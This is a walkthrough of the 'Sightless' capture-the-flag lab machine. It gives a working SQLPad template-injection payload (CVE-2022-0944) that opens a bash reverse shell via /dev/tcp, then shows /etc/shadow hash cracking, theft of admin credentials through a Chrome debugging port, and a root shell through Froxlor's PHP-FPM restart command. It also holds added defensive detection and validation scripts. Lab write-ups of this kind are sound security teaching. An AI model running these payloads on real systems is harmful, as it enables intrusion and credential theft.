# Sightless (Easy)

## Enumeration

Starting with an nmap scan as usual:

```
nmap -sC -sV -vv 10.10.11.32

Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63
| fingerprint-strings:
|   GenericLines:
|     220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGoivagBalUNqQKPAE2WFpkFMj+vKwO9D3RiUUxsnkBNKXp5ql1R+kvjG89Iknc24EDKuRWDzEivKXYrZJE9fxg=
|   256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA4BBc5R8qY5gFPDOqODeLBteW5rxF+qR5j36q9mO+bu
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://sightless.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
```

We see FTP, SSH telling us it's an Ubuntu server, and HTTP on nginx that is redirecting us to "sightless.htb" so let's add it to the /etc/hosts file and check the website.

<figure><img src="/files/lt3jF42MO90OxBGDNCkN" alt=""><figcaption><p>Showing the website</p></figcaption></figure>

Scrolling down the page, we see the SQLPad section, which links to a new virtual host "sqlpad.sightless.htb", so let's add that to /etc/hosts too and check it.

We see an instance of SQLPad running. Googling around, we find CVE-2022-0944, a template-injection vulnerability in the "api/test-connection" endpoint that gives us RCE. If you wish, you can use [this](https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944) GitHub repo for it, but I will be doing the exploit manually in BurpSuite.

First we will make a connection in the website, then click "test" and intercept it in Burp.

<figure><img src="/files/oBerrb0EUP7fQM516WKO" alt=""><figcaption><p>Test connection</p></figcaption></figure>

## Exploitation

Then in Burp, we add a new "data" parameter so that the POST body looks like:

```
{"name":"test","driver":"mysql",
"data": {
"database":"{{process.mainModule.require('child_process').exec('/bin/bash -c \"bash -i >& /dev/tcp/IP/PORT 0>&1\"')}}"  }
}
```
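The payload above works because SQLPad passes connection fields through a template engine before using them, so a field value can carry code. As an added defensive example (not part of this writeup and not SQLPad's own code), here is a server-side check that walks a decoded test-connection body and flags any string field that contains `{{ }}` delimiters or Node.js names that do not belong in a database connection. The sample bodies are constructed; the malicious one is the writeup's payload with IP and PORT left as placeholders, and the benign one uses made-up connection values.

```python
import json
import re
from typing import Any, List

# Mustache-style delimiters used by SQLPad's connection templating, which
# CVE-2022-0944 abuses. A database connection field should never contain them.
TEMPLATE_RE = re.compile(r"\{\{.*?\}\}", re.DOTALL)

# Node.js names that have no business in a connection field.
SUSPICIOUS_TOKENS = ("process.", "require(", "child_process")


def find_template_fields(obj: Any, path: str = "") -> List[str]:
    """Walk a decoded JSON body and return the dotted path of every string
    value that contains template delimiters or one of the suspicious tokens."""
    hits: List[str] = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            child = f"{path}.{key}" if path else str(key)
            hits.extend(find_template_fields(value, child))
    elif isinstance(obj, list):
        for idx, value in enumerate(obj):
            hits.extend(find_template_fields(value, f"{path}[{idx}]"))
    elif isinstance(obj, str):
        if TEMPLATE_RE.search(obj) or any(tok in obj for tok in SUSPICIOUS_TOKENS):
            hits.append(path)
    return hits


def validate_connection_body(raw_json: str) -> List[str]:
    """Parse a test-connection request body and return the offending field
    paths; an empty list means the body is clean and may be processed."""
    return find_template_fields(json.loads(raw_json))


# Constructed samples: the writeup's payload (IP/PORT left as placeholders)
# and a benign connection body with made-up values.
MALICIOUS_BODY = r'''{"name":"test","driver":"mysql","data":{"database":"{{process.mainModule.require('child_process').exec('/bin/bash -c \"bash -i >& /dev/tcp/IP/PORT 0>&1\"')}}"}}'''
BENIGN_BODY = '{"name":"reporting","driver":"mysql","data":{"host":"db.internal","database":"sales","username":"ro","password":"s3cret"}}'

if __name__ == "__main__":
    print(validate_connection_body(MALICIOUS_BODY))  # ['data.database']
    print(validate_connection_body(BENIGN_BODY))     # []
```

The check reports the path of the bad field ("data.database" for the payload above) rather than just a yes/no, which is what you want to log when the request is rejected. Upgrading SQLPad past the vulnerable version is the real fix; a check like this is an extra layer in front of an instance you cannot patch immediately.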

Checking our listener, we get a shell as root, but we are inside a Docker container:

```
nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.16.26] from (UNKNOWN) [10.10.11.32] 43514
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad#
```

Enumerating the container, we find a user called "michael". Since we have root access, we can read "/etc/shadow", take his password hash and try to crack it.

```bash
cat /etc/shadow
cat /etc/shadow
root:$6$......
<SNIP>
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa<SNIP>
```

Loading the hash into John, it cracks easily and we can log in via SSH.

```bash
john --show michael.hash
?:insanec<REDACTED>

1 password hash cracked, 0 left
```

After logging in via SSH, we get user.txt:

```bash
michael@sightless:~$ wc -c user.txt
33 user.txt
```

## ROOT

Enumerating the machine, we find port 8080 listening locally.

```bash
michael@sightless:~$ ss -natpl
State                       Recv-Q                      Send-Q                                            Local Address:Port                                              Peer Address:Port                      Process
<SNIP>
LISTEN                      0                           511                                                   127.0.0.1:8080                                                   0.0.0.0:*
LISTEN                      0                           4096                                              127.0.0.53%lo:53                                                     0.0.0.0:*
LISTEN                      0                           4096                                                  127.0.0.1:40535                                                  0.0.0.0:*
<SNIP>
```

We forward it to our box over SSH so we can access it:

```bash
ssh -L 8080:127.0.0.1:8080 michael@sightless.htb
```

Now going to localhost:8080 on our box, we see a Froxlor instance:

<figure><img src="/files/exOW88nft5jp580J09l6" alt=""><figcaption><p>Website on 8080</p></figcaption></figure>

We try the credentials we already have, but none of them work. On further enumeration of the box, monitoring the processes shows a Chrome instance started with a remote debugging port. Checking the listening ports again and trying the ones in the 40000 range, we find the debug port.
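The DevTools protocol has no authentication of its own, so a Chrome process with `--remote-debugging-port` on a shared host is reachable by any local user who can find the port, even when it is bound to 127.0.0.1. As an added detection example (not part of the writeup), the script below correlates `ps -eo pid,user,args` output with `ss -natpl` output and reports every listening socket owned by a process that was started with remote debugging enabled. Both inputs are constructed samples, not output from this box; the user name "svc", the PIDs and the paths are made up.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of `ps -eo pid,user,args` output; "svc", the PIDs and paths are made up.
PS_SAMPLE = """\
    PID USER     COMMAND
      1 root     /sbin/init
   1337 svc      /opt/google/chrome/chrome --headless --remote-debugging-port=0 --user-data-dir=/tmp/chrome-profile
   1402 svc      /opt/google/chrome/chrome --type=renderer --lang=en-US
   2210 michael  sshd: michael@pts/0
"""

# Constructed sample of `ss -natpl` output as seen by root (ss only fills in the
# Process column for sockets the caller is allowed to inspect).
SS_SAMPLE = """\
State  Recv-Q Send-Q  Local Address:Port  Peer Address:Port Process
LISTEN 0      511         127.0.0.1:8080       0.0.0.0:*     users:(("nginx",pid=900,fd=6))
LISTEN 0      4096    127.0.0.53%lo:53         0.0.0.0:*     users:(("systemd-resolve",pid=500,fd=13))
LISTEN 0      4096        127.0.0.1:40535      0.0.0.0:*     users:(("chrome",pid=1337,fd=20))
"""

DEBUG_FLAG_RE = re.compile(r"--remote-debugging-port(?:=(\d+))?")
SS_LINE_RE = re.compile(
    r'^LISTEN\s+\S+\s+\S+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)",pid=(\d+)'
)


def debug_processes(ps_output: str) -> Dict[int, Tuple[str, str]]:
    """Map pid -> (user, requested port) for every process whose command line
    carries --remote-debugging-port. A requested port of "0" tells Chrome to
    pick a free ephemeral port, so the real port must be read from ss."""
    found: Dict[int, Tuple[str, str]] = {}
    for line in ps_output.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, args = parts
        m = DEBUG_FLAG_RE.search(args)
        if m:
            found[int(pid)] = (user, m.group(1) or "")
    return found


def listening_sockets_by_pid(ss_output: str) -> Dict[int, List[Tuple[str, int]]]:
    """Map pid -> [(local address, port), ...] for the LISTEN rows of ss output."""
    sockets: Dict[int, List[Tuple[str, int]]] = {}
    for line in ss_output.splitlines():
        m = SS_LINE_RE.match(line)
        if m:
            addr, port, pid = m.group(1), int(m.group(2)), int(m.group(4))
            sockets.setdefault(pid, []).append((addr, port))
    return sockets


def find_debug_listeners(ps_output: str, ss_output: str) -> List[dict]:
    """Correlate the two views: every listening socket owned by a process that
    was started with remote debugging enabled."""
    results = []
    sockets = listening_sockets_by_pid(ss_output)
    for pid, (user, requested) in debug_processes(ps_output).items():
        for addr, port in sockets.get(pid, []):
            results.append({"pid": pid, "user": user, "addr": addr, "port": port,
                            "ephemeral": requested == "0"})
    return results


if __name__ == "__main__":
    for hit in find_debug_listeners(PS_SAMPLE, SS_SAMPLE):
        print(f"pid {hit['pid']} ({hit['user']}) exposes DevTools on {hit['addr']}:{hit['port']}")
```

Run it as root on a real host by feeding it the two command outputs; as an unprivileged user `ss` leaves the Process column empty for other users' sockets, which is why the writeup had to probe the 40000 range by hand. Anything the script reports should be treated as an unauthenticated control channel into that browser session, including whatever credentials the session types into pages.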

First let's forward the port alongside 8080.

```bash
ssh -L 8080:127.0.0.1:8080 -L 41557:127.0.0.1:41557 michael@sightless.htb
```

Then, in a Chromium-based browser, we go to "chrome://inspect", click "Configure", and add the host and port we forwarded:

<figure><img src="/files/8sEmXFbh06dTMigwTRSH" alt=""><figcaption><p>Debug port</p></figcaption></figure>

After clicking "Done", we can see:

<figure><img src="/files/BcaRlk6Ki3txTEf47P3J" alt=""><figcaption><p>Showing result</p></figcaption></figure>

Inspecting it, we see requests being made to the Froxlor site; in the Network tab we can watch it log in and recover the admin password.

<figure><img src="/files/R712UuvAbWTuMj4eiGZ1" alt=""><figcaption><p>Admin credentials</p></figcaption></figure>

And we get access to the admin dashboard.

In the PHP-FPM configuration tab we can edit the restart command ("<http://127.0.0.1:8080/admin_phpsettings.php?page=fpmdaemons&action=edit&id=1>"). We write a bash one-liner reverse shell to /tmp/vamp.sh, set the restart command to "bash /tmp/vamp.sh", then restart PHP-FPM from the system configuration tab, and a reverse shell arrives on our listener:

```bash
root@sightless:~# ls
ls
docker-volumes
root.txt
scripts
root@sightless:~# wc -c root.txt
wc -c root.txt
33 root.txt
```
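The root step works because a free-text field in the panel becomes a command run as root, so whoever can edit that field owns the host. As an added example of how such a field could be guarded (a hypothetical allowlist check written for this page, not Froxlor's own validation), the function below accepts only a service-manager invocation that restarts or reloads a PHP-FPM unit and rejects everything else, including the writeup's `bash /tmp/vamp.sh`. The allowed binaries, actions and unit pattern are assumptions chosen for the example.

```python
import os
import re
import shlex
from typing import Tuple

# Anything that lets one command become two, or redirects I/O, is rejected outright.
SHELL_META_RE = re.compile(r"[;&|`$<>(){}\n\\]")

# Only the service managers themselves may be invoked, and only to restart/reload.
ALLOWED_BINARIES = {"systemctl", "service"}
ALLOWED_ACTIONS = {"restart", "reload"}

# The unit must look like a PHP-FPM service (php-fpm, php8.1-fpm, php-fpm.service, ...).
UNIT_RE = re.compile(r"^php[\w.-]*fpm(?:\.service)?$")


def validate_restart_command(command: str) -> Tuple[bool, str]:
    """Return (ok, reason) for a PHP-FPM restart command submitted through a
    web panel. Hypothetical allowlist check, not Froxlor's own logic."""
    if SHELL_META_RE.search(command):
        return False, "shell metacharacters are not allowed"
    try:
        argv = shlex.split(command)
    except ValueError as exc:
        return False, f"cannot parse command: {exc}"
    if len(argv) != 3:
        return False, "expected exactly three words: <manager> <action> <unit>"
    binary = os.path.basename(argv[0])
    if binary not in ALLOWED_BINARIES:
        return False, f"binary {argv[0]!r} is not an allowed service manager"
    # `service <unit> <action>` puts the unit first; systemctl puts the action first.
    if binary == "service":
        unit, action = argv[1], argv[2]
    else:
        action, unit = argv[1], argv[2]
    if action not in ALLOWED_ACTIONS:
        return False, f"action {action!r} is not restart/reload"
    if not UNIT_RE.match(unit):
        return False, f"unit {unit!r} is not a PHP-FPM service"
    return True, "ok"


if __name__ == "__main__":
    for cmd in ("systemctl restart php8.1-fpm",
                "service php8.1-fpm restart",
                "bash /tmp/vamp.sh",
                "systemctl restart php8.1-fpm; bash /tmp/vamp.sh"):
        print(f"{cmd!r}: {validate_restart_command(cmd)}")
```

Rejecting metacharacters before parsing matters: `shlex` would happily split `systemctl restart php8.1-fpm; bash /tmp/vamp.sh` into words, and the trailing `;` would only be caught by the unit pattern. The check also says nothing about who may edit the field, so on a real deployment it belongs next to a restriction on which panel accounts can touch PHP-FPM settings at all.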

Happy hacking :) :vampire:

